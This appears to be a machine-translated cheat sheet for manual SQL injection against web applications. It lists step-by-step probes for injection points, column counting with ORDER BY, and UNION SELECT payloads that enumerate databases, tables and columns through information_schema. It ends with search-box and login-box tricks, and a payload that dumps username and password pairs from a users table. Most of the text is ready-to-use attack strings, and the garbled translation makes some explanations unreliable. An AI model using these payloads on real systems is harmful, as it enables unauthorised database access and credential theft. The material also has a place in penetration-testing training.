First, the general idea of Sql simple hand Note:
1, is not look at the injection point (string, integer)
2, determines the number of fields
3, can be used to determine whether the union joint inquiry (whether the display position)
4, get all the database names
5, access to the database table name
6, access to the field names in the table
7, access to information in the data field
1, look at the injection point is not
* Single quotation marks ( ') if error then there may be
Enter? 2-1 page variations (numeric)
* Numeric: and 1 = 1 normal; and 1 = 2 error
or 2> 1 normal; or 1> 2 given
xor 1 = 1 error; xor 1 = 2 Normal
and 1 = 1 url encoding:% 41% 4E% 44% 20 %% 31% 3D% 31
-0 page unchanged; -1 error page
Char *: Closed single quotation marks (double quotation marks, parentheses)
Plus #; 27%; - whether closed +
'And' 1 '=' 1 normal; 'and' 1 '=' 2 given
*-Terminated string: -; #; 23%; 00%; / *
Termination method: -, '-') -,) - ')) -)) -
2, determines the number of fields
1’ order by 1 --+
1’ order by 2 --+
... until the error
(Numeric injection parameter is not correct or single quotes)
3, can be used to determine whether the union joint inquiry (whether the display position)
1‘ union select 1,2,3… --+
4, get all the database names
1‘ union select 1,2,database() --+
@@ basedir query the database installation path
@@ datadir directory database query
version () version of the database query
user () to query the current user database
database () the name of the database currently in use
5, to obtain the table name in the database
id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
6, obtaining table fields
id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
7, access to information data field
id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
Second, other simple injection
1, the search box
Search ', &, [,],%, $, @, and other special characters, if possible to return to normal injection
%' and 1=1 and '%'='% ;%' and 1=2 and '%'='%
2, login box
Use #, - are invalid, but the use of \ error, this time on sqlmap, may have injected